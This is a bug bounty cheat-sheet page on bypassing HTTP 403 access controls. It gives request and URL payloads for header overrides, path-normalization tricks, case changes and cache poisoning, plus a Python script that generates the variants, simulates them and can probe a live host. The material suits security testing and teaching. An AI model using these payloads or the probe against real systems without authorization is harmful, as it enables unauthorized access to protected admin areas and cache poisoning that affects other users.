AllAboutBugBounty/Bypass/Bypass 403.md
2021-07-21 22:38:57 +07:00

# 403 Forbidden Bypass
## Tools
* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403)
## Exploit
1. Using the "X-Original-URL" header. Some back-ends route on this header instead of the path in the request line, so a front-end rule that only inspects the request line never sees /admin:
```
GET /admin HTTP/1.1
Host: target.com
```
Try this to bypass
```
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
```
2. Appending **%2e** after the first slash. `%2e` is a percent-encoded dot, so `/%2e/admin` becomes `/./admin` once the back-end decodes and normalizes it, while a front-end that compares the raw path does not match `/admin`:
```
http://target.com/admin => 403
```
Try this to bypass
```
http://target.com/%2e/admin => 200
```
3. Add dot (.), slash (/) and semicolon (;) characters to the path. These rely on the same mismatch: the literal path differs from the one the back-end serves after it collapses the extra segments (servlet containers such as Tomcat also drop everything after `;` in a segment as a path parameter):
```
http://target.com/admin => 403
```
Try this to bypass
```
http://target.com/admin/. => 200
http://target.com//admin// => 200
http://target.com/./admin/.. => 200
http://target.com/;/admin => 200
http://target.com/.;/admin => 200
http://target.com//;//admin => 200
```
4. Add "..;/" after the directory name
```
http://target.com/admin
```
Try this to bypass
```
http://target.com/admin..;/
```
5. Change the case of letters in the path. This works when the access rule is case-sensitive but the back-end's routing or filesystem is not (IIS on Windows, for example):
```
http://target.com/admin
```
Try this to bypass
```
http://target.com/aDmIN
```
6. Via web cache poisoning. The same override header, aimed at a cache in front of the origin: if the cache keys on the path in the request line but the origin serves the path named in "X-Original-URL", the /admin response can be stored under /anything and served from there to other clients:
```
GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin
```
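The six techniques above, as an added example that is not code from the original page or from the bypass-403 tool: a Python script that builds every variant for one protected path, runs them through a simulated edge/back-end pair to show which normalization mismatch each variant exploits, and can send the same variants to a live host. `target.com` and `/admin` are the page's placeholders; the edge rule (literal match on the request-line path) and the back-end behaviour (honouring X-Original-URL, dropping `;` path parameters, percent-decoding, collapsing dot segments, case-insensitive routing) are assumptions chosen for illustration, not any real product.

```python
"""Added example: not code from the original page or from the bypass-403 tool.

Builds the variants from techniques 1-6 for one protected path, runs them
through a simulated edge/back-end pair to show which normalisation mismatch
each one exploits, and can send the same variants to a live host.  target.com
and /admin are the page's placeholders; the edge rule and back-end behaviour
below are assumptions chosen for illustration, not any real product.
"""
import posixpath
import urllib.error
import urllib.request
from urllib.parse import unquote


def mixed_case(segment):
    """Technique 5: alternate the case of each letter, e.g. admin -> aDmIn."""
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(segment))


def candidates(protected):
    """Return (name, raw_path, headers) triples for a protected path such as /admin."""
    s = protected.strip("/")
    paths = [
        ("%2e-after-slash", f"/%2e/{s}"),     # 2: encoded dot segment
        ("trailing-dot", f"/{s}/."),          # 3: '.' segment at the end
        ("double-slash", f"//{s}//"),         # 3: doubled slashes
        ("dot-dotdot", f"/./{s}/.."),         # 3: './' prefix and '..' suffix
        ("semicolon", f"/;/{s}"),             # 3: ';' segment (path parameter)
        ("dot-semicolon", f"/.;/{s}"),        # 3
        ("double-semicolon", f"//;//{s}"),    # 3
        ("dotdot-semicolon", f"/{s}..;/"),    # 4: '..;/' after the directory name
        ("mixed-case", f"/{mixed_case(s)}"),  # 5: case change
    ]
    out = [(name, path, {}) for name, path in paths]
    # 1 and 6: request a harmless path and name the real one in the override header.
    out.append(("x-original-url", "/anything", {"X-Original-URL": protected}))
    return out


def simulated_edge(raw_path, protected):
    """Assumed front-end rule: deny the literal request-line path, no decoding."""
    return raw_path.rstrip("/") == protected.rstrip("/")


def simulated_backend(raw_path, headers, protected):
    """Assumed back-end: honours X-Original-URL, drops ';' path parameters per
    segment, percent-decodes, collapses '.', '..' and '//', routes case-insensitively."""
    path = headers.get("X-Original-URL", raw_path)
    path = unquote(path)
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    path = "/" + posixpath.normpath(path).lstrip("/")
    return 200 if path.lower() == protected.lower() else 404


def simulate(protected="/admin"):
    """Status each variant gets from the simulated stack; 'baseline' is the plain request."""
    results = {}
    for name, raw_path, headers in [("baseline", protected, {})] + candidates(protected):
        if simulated_edge(raw_path, protected):
            results[name] = 403
        else:
            results[name] = simulated_backend(raw_path, headers, protected)
    return results


def probe(base, protected="/admin", timeout=5):
    """Send every variant to a live host (base such as http://target.com) and return
    (name, status, body_length).  Compare each length with the baseline: a 200 that
    returns the same error page, or a redirect that lands on a login page, is not
    a bypass (urlopen follows redirects, so the final status is what you see)."""
    out = []
    for name, raw_path, headers in [("baseline", protected, {})] + candidates(protected):
        req = urllib.request.Request(base + raw_path, headers=headers)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                out.append((name, resp.status, len(resp.read())))
        except urllib.error.HTTPError as err:
            out.append((name, err.code, len(err.read())))
    return out


if __name__ == "__main__":
    for name, status in simulate("/admin").items():
        print(f"{status}  {name}")
```

Running the script prints which variants land in the simulated stack: the `/./admin/..` and `/admin..;/` forms normalize to something other than `/admin` there and come back 404, which is the point of the exercise. Which ones work against a real target depends entirely on how its front-end and back-end each normalize the path, so treat `probe()` output as leads to verify by hand, comparing body length and content against the baseline 403 rather than trusting the status code alone.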
Sources:
- [@iam_j0ker](https://twitter.com/iam_j0ker)
- [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web)